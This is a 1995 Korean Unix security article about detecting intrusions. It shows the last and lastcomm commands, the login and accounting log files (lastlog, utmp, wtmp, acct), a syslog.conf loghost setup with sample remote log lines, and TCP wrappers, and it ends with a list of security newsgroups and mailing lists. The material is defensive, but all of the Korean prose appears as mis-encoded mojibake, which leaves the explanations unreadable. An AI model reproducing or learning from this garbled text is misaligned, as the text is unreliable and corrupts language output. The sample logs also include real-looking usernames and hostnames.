        Last login: Fri Mar 3 02:05:42 on console
        SunOS Release 4.1.3-KLE1.1.3 (BARAM_KOR) #2: Sun Sep 26 10:16:21 KST
        1993
        You have mail.
        1995³â03¿ù03ÀÏ(±Ý) 03½Ã10ºÐ34ÃÊ KST
        %
        
        
    ¿©±â¿¡ ³ªÅ¸³ª´Â Last loginÀ» È®ÀÎÇÏ°í ÀÚ½ÅÀÌ ·Î±×ÀÎÇÑ ½Ã°£´ë°¡ ¾Æ´Ñ¶§¿¡ ·Î±×ÀÎÀÌ µÆ´Â°¡¸¦ È®ÀÎÇØ º»´Ù. ħÀÔÀÚ°¡ µé¾î¿Â °Í °°Àº
    ÀǽÉÀÌ µé ¶§ °ü¸®ÀÚ¿¡°Ô ¿¬¶ôÇØ ±× ½Ã°£´ëÀÇ ·Î±×¿Í ÇÁ·Î¼¼½º¸¦ È®ÀÎÇØ ÃßÀûÀ» Çϵµ·Ï ÇÑ´Ù. ȤÀº À§¿Í °°ÀÌ ÀÚ½ÅÀÇ ½Ã ½ºÅÛ ·Î±×ÀÎ
    ¸Þ½ÃÁö¸¦ È®ÀÎÇÏ´Â ¹æ¹ýµµ ÀÖÁö¸¸, ´Ù¸¥ ¹æ¹ýÀ¸·Î, last¶ó´Â ¸í·ÉÀ» ÀÌ¿ë, ÀÚ½ÅÀÇ ½Ã½ºÅÛ¿¡ ÀÚ½ÅÀÇ À̸§À¸·Î µé¾î¿Â À¯Àú¸¦ ãÀ» ¼öµµ
    ÀÖ´Ù. ´ÙÀ½Àº lastÀÇ ¿¹ÀÌ´Ù.
    
    
        % last | more
        
        ksh ttyqd casaturn.kaist.a Thu Mar 16 16:52 still logged in
        chkim ttyr9 dal1.kaist.ac.kr Thu Mar 16 16:50 still logged

in
        hjha ttyqd danso.kaist.ac.k Thu Mar 16 16:49 - 16:51 (00:01)
        hjha ttyra danso.kaist.ac.k Thu Mar 16 16:47 - 16:47 (00:00)
        solee ttyra dangun.kaist.ac. Thu Mar 16 16:46 - 16:46 (00:00)
        yjkim ttyr9 gaea.kaist.ac.kr Thu Mar 16 16:44 - 16:50 (00:05)
        chkim ttyr9 dal1.kaist.ac.kr Thu Mar 16 16:42 - 16:43 (00:01)
        drunken ttyra chagall.kaist.ac Thu Mar 16 16:40 - 16:40 (00:00)
        shhong ttyra dbserver.kaist.a Thu Mar 16 16:39 - 16:39 (00:00)
        jhlee ttyr9 paradise.kaist.a Thu Mar 16 16:38 - 16:39 (00:01)
        hjha ttyra danso.kaist.ac.k Thu Mar 16 16:36 - 16:37 (00:00)
        
        
    À§ÀÇ ¿¹¿¡¼­, last | grep myloginnameÀ» ÀÔ·ÂÇϸé, ÀÚ½ÅÀÇ ID·Î ¾ðÁ¦ ¾îµð¼­, ´©°¡ ·Î±×ÀÎÇß´ÂÁö¸¦ ¾Ë ¼ö ÀÖ°Ô µÈ´Ù.
    ¼÷·ÃµÈ ÇØÄ¿´Â À§ÀÇ last Á¤º¸°¡ À¯ÁöµÈ ½Ã½ºÅÛ ÆÄÀÏÀ» Áö¿ì°í °¡Áö¸¸, ¿©±â¼­´Â ºñ¼÷·Ã ÇØÄ¿¸¦ °¡Á¤ÇÏ°í ¸í·ÉÀ» Ãĺ¼ ¼ö ÀÖ´Ù. ¶Ç´Â ¾à
    °£Àº

¸Õ À̾߱âÀÌÁö¸¸, ÇØÄ¿°¡ µé¾î¿Í¼­ ¾î¶² ÀÏÀ» ÇÏ°í °¬´ÂÁö¸¦ ¾Ë¾Æ³»±â À§Çؼ­´Â lastcommÀ̶ó´Â ¸í·É¾î°¡ ÀÖ´Ù. lastcommÀº
    Áö±Ý À̽ð£±îÁö ½Ã½ºÅÛ¿¡¼­ ¼öÇàµÇ¾ú´ø ¸í·É¾îµéÀ» º¸¿©ÁÖ°Ô µÈ´Ù. ¸¸¾à¿¡ lastcommÀÌ ÀÛµ¿µÇÁö ¾Ê´Â´Ù¸é ½Ã½ºÅÛ °ü¸®ÀÚ°¡ ´Ù À½ÀÇ
    ¸í·ÉÀ» ¼öÇàÇϵµ·Ï ÇØ¾ß ÇÑ´Ù.
    
    
        % /usr/etc/accton /usr/adm/acct
        
        % lastcomm | more
        msgs ksh ttyp2 0.03 secs Thu Mar 16 16:58
        less ksh ttyp2 0.06 secs Thu Mar 16 16:58
        csh F ksh ttyp2 0.00 secs Thu Mar 16 16:58
        csh F ksh ttyp2 0.00 secs Thu Mar 16 16:58
        date ksh ttyp2 0.02 secs Thu Mar 16 16:58
        stty ksh ttyp2 0.02 secs Thu Mar 16 16:58
        stty ksh ttyp2 0.02 secs Thu Mar 16 16:58
        biff ksh ttyp2 0.02 secs Thu Mar 16 16:58
        hostname ksh ttyp2 0.02 secs Thu Mar 16 16:58
        whoami ksh ttyp2 0.03 secs Thu Mar 16 16:58
  

      hostname ksh ttyp2 0.02 secs Thu Mar 16 16:58
        hostname ksh ttyp2 0.02 secs Thu Mar 16 16:58
        hostname ksh ttyp2 0.02 secs Thu Mar 16 16:58
        
        
    Àü¹®µÈ ÇØÄ¿¿Í À̸¦ ¸·´Â º¸¾ÈÆÀÀº Ç×»ó ¿©·¯°¡Áö ÆÄÀÏÀ» ÀÌ¿ëÇؼ­ º¸¾ÈÀ» üũÇÏ°Ô µÇ¸ç, last, lastcommÀº ÇϳªÀÇ ½ÃÀÛ¿¡ ºÒ
    °úÇÏ´Ù. ÀÌ ÀýÀÇ ³»¿ëÀ» Á¤¸®Çϸé, ½Ã½ºÅÛ¿¡ ·Î±×ÀÎ ÇÏ°í ·Î±×¾Æ¿ôÇÏ¸é ±× ±â·ÏÀÌ ¾îµò°¡ ³²´Â´Ù´Â °ÍÀε¥. ´ÙÀ½ÀÇ ³×°¡Áö ÆÄÀÏ ÀÌ
    ´ëÇ¥ÀûÀÌ´Ù.
    
    
    /usr/adm/lastlog °¢ À¯Àú¸¶´Ù °¡Àå ÃÖ±ÙÀÇ ·Î±×ÀÎ ½Ã°£À» ±â·ÏÇÑ´Ù.
                finger ³ª someone ¿¡ ÀÇÇØ ¾Ë ¼ö ÀÖ´Ù.
                /etc/utmp À¯Àú°¡ ·Î±×ÀÎ ÇÒ ¶§¸¶´Ù ½Ã°£À» Àû¾îµÐ´Ù.
                /usr/adm/wtmp À¯Àú°¡ ·Î±×ÀÎ/·Î±× ¾Æ¿ôÇÒ ¶§ ½Ã°£À» Àû¾îµÐ´Ù.
                last ¶Ç´Â last someone ÀÇ ¸í·ÉÀ» Ãļ­ ³»¿ëÀ» ¾Ë¼öÀÖ´Ù.
                /usr/adm/acct À¯ÀúµéÀÌ »ç¿ëÇÏ´Â ¸í·É¾î¸¦ Àû¾îµÐ´Ù.
                lastcomm À» Ä¡¸é ³»¿ëÀ» ¾Ë ¼ö ÀÖ´Ù.
        
    
    ÇÏÁö¸¸, ½ÇÁ¦·Î ÇØÄ¿µéÀº ÀÌ ¸ðµç ÆÄÀϵéÀ» Áö¿ì°í

 ³ª°¡´Â °ÍÀÌ º¸ÅëÀ̸ç(»ý°¢À» º¸¶ó, ³ª°¥ ¶§ ÀڱⰡ µé¾î¿Ô´Ù´Â Áõ°Å¸¦ ÀÔ¸ê ÇÏ°í ³ª°¡´Â
    °ÍÀÌ ÇØÄ¿ÀÇ ÀÔÀåÀ¸·Î ¼­´Â ´ç¿¬ÇÑ °ÍÀÌ ¾Æ´Ï°Ú´Â°¡), µû¶ó¼­ ÀÏÁ¤ÇÑ ½Ã°£ °£°Ý¸¶´Ù ȤÀº ÇÏ·çÀÇ ¾î´À ¶§¿¡ ¼öÇàÇÏ µµ·Ï Á¦¾îÇØÁÖ´Â
    cron¸í·ÉÀ» ÀÌ¿ëÇØ °è¼Ó À§ÀÇ ÆÄÀÏÀ» ¹é¾÷À» ÇÑ´Ù¸é ÇØÄ¿¸¦ Á»´õ ¾î·Æ°Ô ¸¸µé ¼ö ÀÖ°Ú´Ù. ÀÌ´Â °ü¸®ÀÚ¿¡°Ô ÇÊ¿ä ÇÑ ºÎºÐÀÌÁö¸¸, ¾ÈÀüÇÑ
    È£½ºÆ®¸¦ ¼±ÅÃÇØ log¸¸À» ³²±â´Â È£½ºÆ®¸¦ µÎ¸é ´õ¿í È®½ÇÇÏ´Ù.(ÀÌ´Â ¹°·Ð Àåºñ¿¡ ¿©À¯°¡ ÀÖÀ» ¶§ÀÇ ÀÌ¾ß ±âÀÌ´Ù) ¿¹¸¦ µé¸é,
    
    /etc/syslog.conf ¿¡¼­ Á¤ÀǸ¦ Çϵµ·Ï ÇÏÀÚ.
    
    
        #
        # syslog configuration file
        #
        define LOGHOST eve
        *.err;kern.debug;auth.notice;user.none /dev/console
        mail.debug ifdef('LOGHOST',/var/log/syslog,@loghost)
        mail.debug /var/log/syslog
        
        
    ·Î±× È£½ºÆ®¸¦ ¼³Á¤ÇÑ ¿¹¸¦ µé¾îº¸ÀÚ. ´ÙÀ½ ·Î±×´Â ·Î±× È£½ºÆ®ÀÎ eldar ÀÇ ·Î±× ÆÄÀÏ¿¡ ±â·ÏµÈ °ÍÀÌ´Ù. elbereth,
    luthien, be ren, eru, frodo, sam, aragorn, gandalf, faramir, legolasgimli,
    indigo

1,3,4,10, applicÀÌ eldar·Î ·Î±×¸¦ º¸³»µµ·Ï ¼³Á¤µÅÀÖ´Ù.
    
    
        Mar 17 02:43:28 6C:eldar fingerd[17516]: connect from baikdu.kaist.ac.kr
        Mar 17 02:43:42 6D:eldar ftpd[17518]: connection from baikdu.kaist.ac.kr
        Mar 17 02:43:54 5E:eldar ftpd[17518]: FTP LOGIN FAILED FROM
        baikdu.kaist.ac.kr,
        chester
        Mar 17 02:44:15 6E:eldar ftpd[17518]: FTP LOGIN FROM baikdu.kaist.ac.kr
        as chester
        Mar 17 09:37:16 6C:luthien.seri.re.kr sendmail[10578]: JAA10572:
        to=sysuh@kigam.re.kr, ctladdr=news (15/15), delay=00:0 0:09,
        mailer=smtp, relay=sdp.kigam.re.kr.
        [134.75.144.201], stat=Sent (JAA15213 Message accepted for delivery)
        Mar 17 13:31:46 6B:frodo.seri.re.kr Xsession: poison: login
        Mar 17 13:40:32 6C:gimli.seri.re.kr ftpd[

533]: connect from
        eve.kaist.ac.kr
        Mar 17 13:49:32 6D:indigo1.seri.re.kr ftpd[533]: connection from
        robin.kaist.ac.kr
        
        
    ÀÌ·± ¹æ¹ý ¿Ü¿¡µµ ÆÄÀ̾î¿ù, TCP wrapper µîÀ» ÀÌ¿ëÇØ ¾Æ¿¹ ¿ÜºÎ¿¡¼­ÀÇ Á¢±ÙÀ» ¸·¾Æ¹ö¸± ¼ö ÀÖ´Ù. ¹°·Ð tcpdump³ª
    netmonµéÀ» »ç¿ëÇØ ÀÚ½ÅÀÇ È£½ºÆ®·ÎÀÇ ¸ðµç Á¢±ÙÀ» °¨½ÃÇÒ ¼öµµ ÀÖ´Ù. ÀÌ¿Í °°ÀÌ ¹æ¾îÇÏ´Â ±â¼úµµ Á¡Á¡ °íµµÈ­°¡ µÇ¾î °í¼öÁØÀÇ ÇØÄ¿°¡
    ¾Æ´Ï ¸é ħÅõÇϱ⠾î·Á¿î È£½ºÆ®°¡ ´Ã¾î°¡°í ÀÖ´Ù.
    
    ±× ¹«¼öÇÑ ¹ö±×µéÀ» ¸ðµÎ ¸Ó¸®¿¡ ¿Ü¾îµÎ°í À̸¦ ¸ðµÎ ÆÐÄ¡Çϱâ¶õ »ó´çÈ÷ ¾î·Á¿î ÀÏÀÌ´Ù. ÀÌ·± °æ¿ì¿¡´Â º¸¾ÈÅøÀ» ÀÌ¿ëÇÏ¿© ü Å©¸¦ ÇÏ´Â °ÍÀÌ
    ¸¹Àº ½Ã°£À» Àý¾àÇÒ ¼ö ÀÖ°Ô µÈ´Ù. ´ÙÀ½È£(6¿ùÈ£)
    
    
    o ´º½º±×·ì o ¸ÞÀϸµ ¸®½ºÆ®
                alt.2600 cert-advisory@cert.org
                alt.2600.hope.tech ciac-listproc@llnl.gov
                alt.cracks majordomo@suburbia.net
                alt.hackers majordomo@greatcircle.com
                alt.hackintosh bugtraq-r

equest@crimelab.com
                alt.hacker.malicious majordomo@8lgm.org
                alt.security security@baikdu.kaist.ac.kr
                alt.security.pgp
                alt.security.ripem
                comp.risks
                comp.security.announce
                comp.security.misc
                comp.security.unix
                misc.security